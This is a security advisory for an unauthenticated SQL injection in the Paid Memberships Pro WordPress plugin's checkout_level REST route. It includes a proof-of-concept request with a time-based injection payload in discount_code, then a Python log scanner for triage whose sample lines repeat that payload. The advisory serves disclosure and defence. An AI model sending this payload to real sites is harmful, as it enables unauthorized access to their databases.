EPSS: 0.03 (Low), Percentile: 91.0%
The plugin does not escape the discount_code parameter in one of its REST routes (available to unauthenticated users) before using it in a SQL statement, leading to a SQL injection.
https://example.com/?rest_route=/pmpro/v1/checkout_level&level_id=3&discount_code=' union select sleep(1) -- g
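For triage on a site that ran an affected version, the following added example (not part of the advisory or the plugin's code) scans web access logs for requests to this route whose discount_code falls outside an allowlist. Assumptions: combined log format, discount codes limited to letters, digits, "-" and "_", and the route also being reachable under WordPress's /wp-json/ path form; the log lines are constructed.

```python
import re
from urllib.parse import urlsplit, parse_qs

ROUTE = "/pmpro/v1/checkout_level"
# Assumption: legitimate discount codes are short tokens of letters, digits, "-" and "_".
SAFE_CODE = re.compile(r"[A-Za-z0-9_-]{0,64}")
REQUEST = re.compile(r'"(?:GET|POST) (\S+) HTTP/[\d.]+"')

def suspicious_discount_code(target):
    """Return the decoded discount_code if the request hits the route with a
    value outside the allowlist, otherwise None."""
    parts = urlsplit(target)
    query = parse_qs(parts.query)  # percent-decodes names and values
    via_param = any(r.rstrip("/") == ROUTE for r in query.get("rest_route", []))
    via_path = parts.path.rstrip("/").endswith("/wp-json" + ROUTE)
    if not (via_param or via_path):
        return None
    for code in query.get("discount_code", []):
        if not SAFE_CODE.fullmatch(code):
            return code
    return None

def scan(lines):
    """Return (client_ip, decoded_discount_code) for every flagged request."""
    hits = []
    for line in lines:
        match = REQUEST.search(line)
        if match:
            code = suspicious_discount_code(match.group(1))
            if code is not None:
                hits.append((line.split()[0], code))
    return hits

# Constructed sample log lines (documentation IP ranges, made-up timestamps).
SAMPLE_LOG = [
    '203.0.113.7 - - [01/Jan/2022:10:00:00 +0000] "GET /?rest_route=/pmpro/v1/checkout_level'
    '&level_id=3&discount_code=%27%20union%20select%20sleep(1)%20--%20g HTTP/1.1" 200 512',
    '198.51.100.4 - - [01/Jan/2022:10:00:05 +0000] "GET /wp-json/pmpro/v1/checkout_level'
    '?level_id=3&discount_code=SPRING-20 HTTP/1.1" 200 431',
    '198.51.100.9 - - [01/Jan/2022:10:00:09 +0000] "GET /?s=%27%20union HTTP/1.1" 200 9000',
    '192.0.2.15 - - [01/Jan/2022:10:01:00 +0000] "GET /wp-json/pmpro/v1/checkout_level'
    '?level_id=3&discount_code=%27%20union%20select%20sleep(1)%20--%20g HTTP/1.1" 200 512',
]

if __name__ == "__main__":
    for ip, code in scan(SAMPLE_LOG):
        print(f"{ip}\tdiscount_code={code!r}")
```

The allowlist is deliberately strict, so a hit means "review this request", not "confirmed injection"; widen SAFE_CODE if the site issues codes with other characters.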
www.paidmembershipspro.com/pmpro-update-2-6-7-security-release/